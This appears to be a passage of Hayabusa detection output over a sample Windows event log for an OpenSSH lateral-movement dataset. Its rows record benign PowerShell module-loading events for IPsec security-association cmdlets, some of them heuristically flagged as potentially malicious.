Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.808 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.833 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.833 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.833 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.834 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.834 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.834 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.859 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 